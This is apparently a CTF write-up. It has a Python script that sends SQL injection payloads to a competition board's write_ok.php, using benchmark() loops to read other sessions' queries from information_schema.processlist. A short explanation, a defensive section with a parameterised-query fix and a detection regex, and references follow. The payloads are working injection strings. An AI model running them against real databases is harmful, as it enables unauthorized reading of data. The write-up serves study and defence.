import requests

# target board insert: bbs(title,writer,contents)
url = 'http://110.10.147.36/write_ok.php'
sid = '35p14j8h1all6avl46rcopfm34'   # logged-in PHPSESSID

for i in range(1):
    print(str(i))
    title = 'ss' + str(i)
    # first attempt: read the current processlist once
    query = "qwer'),('gogo','say222',(select group_concat(info) from information_schema.processlist))#"
    # second attempt: spin with benchmark() and keep appending processlist snapshots to @query
    query2 = "qwer'),('gg4','say222',(select group_concat(benchmark(99999999,@query:=concat(@query,(select group_concat(info) from information_schema.processlist))),@query)))#"
    # final payload: shorter benchmark loop, only collect statements containing 'create'
    query2 = "qwer'),('gg5','say222',(select group_concat(@q3:=0x3333,benchmark(99,@q3:=concat(@q3,(select group_concat(info) from information_schema.processlist where info like '%create%'))),@q3)))#"
    #query2 = "qwer'),('gg4','say222',(select @q3:=0x3232))#"
    #query2 = "qwer'),('gg','say222',(select @q3))#"
    #query="qwer'),('gg','say222',(select group_concat(current_statement) from sys.processlist))#"
    res = requests.post(url, data={'title': title, 'contents': query2}, cookies={'PHPSESSID': sid})
    #for i in range(1):
    #    d=requests.get('http://110.10.147.36/?p=secret&C=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&T=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&F=cccccccccccccccccccccccccccccccc',cookies={'PHPSESSID':sid})
    #res=requests.post(url,data={'title':title,'contents':query},cookies={'PHPSESSID':sid})
    print(res.text)


I couldn't solve this during the competition. Actually, our team had planned to skip the web problems unless we had a lot of time left..

Not having a web hacker on the team was too big a hole... I have a lot to say, so I should write a separate post-mortem post..


There was a SQL injection in the diary content, and

if you loop with benchmark while triggering the SELECT statement in secret, you can sniff the query text from processlist.
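An added example (not part of the original writeup, and not the CTF's real source) showing why the payload shape above works and what the fix looks like: a hypothetical reconstruction of a string-concatenated INSERT like the one behind write_ok.php, the same INSERT with bound parameters (sqlite3 stands in for MySQL), and a simple server-side check for processlist/benchmark subqueries in submitted content.

```python
import re
import sqlite3

# Constructed sample input: the payload shape from the writeup. It closes the
# current VALUES tuple, appends a second row whose third column is a subquery,
# and comments out the rest of the statement with '#'.
PAYLOAD = ("qwer'),('gogo','say222',"
           "(select group_concat(info) from information_schema.processlist))#")

def unsafe_insert_sql(title, writer, contents):
    # Hypothetical reconstruction of a write_ok.php that concatenates user
    # input into a multi-column INSERT (assumption, not the real CTF source).
    return ("INSERT INTO bbs(title,writer,contents) VALUES ('%s','%s','%s')"
            % (title, writer, contents))

def value_rows(sql):
    # Count VALUES tuples that survive a MySQL '#' line comment; more than one
    # row from a single-row form means the input broke out of its string.
    body = sql.split("#", 1)[0]
    return len(re.findall(r"\('", body[body.index("VALUES"):]))

def safe_insert(title, writer, contents):
    # Parameterised form: the driver binds the value, so the payload is stored
    # as plain text in one row. sqlite3 stands in for MySQL here (assumption).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE bbs(title TEXT, writer TEXT, contents TEXT)")
    con.execute("INSERT INTO bbs(title,writer,contents) VALUES (?,?,?)",
                (title, writer, contents))
    rows = con.execute("SELECT contents FROM bbs").fetchall()
    con.close()
    return [r[0] for r in rows]

# Server-side detection heuristic for this specific technique: subqueries
# against the process list and benchmark() loops used to hold a slot open.
SNIFF_RE = re.compile(r"(information_schema|sys)\.processlist|benchmark\s*\(", re.I)

def looks_like_processlist_sniff(contents):
    return bool(SNIFF_RE.search(contents))

if __name__ == "__main__":
    print(value_rows(unsafe_insert_sql("ss0", "user", PAYLOAD)))  # 2
    print(safe_insert("ss0", "user", PAYLOAD))                     # [PAYLOAD]
    print(looks_like_processlist_sniff(PAYLOAD))                   # True
```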


References


rubiya's presentation slides


http://secuinside.com/archive/2017/2017-1-2.pdf


http://chaneyoon.tistory.com/333



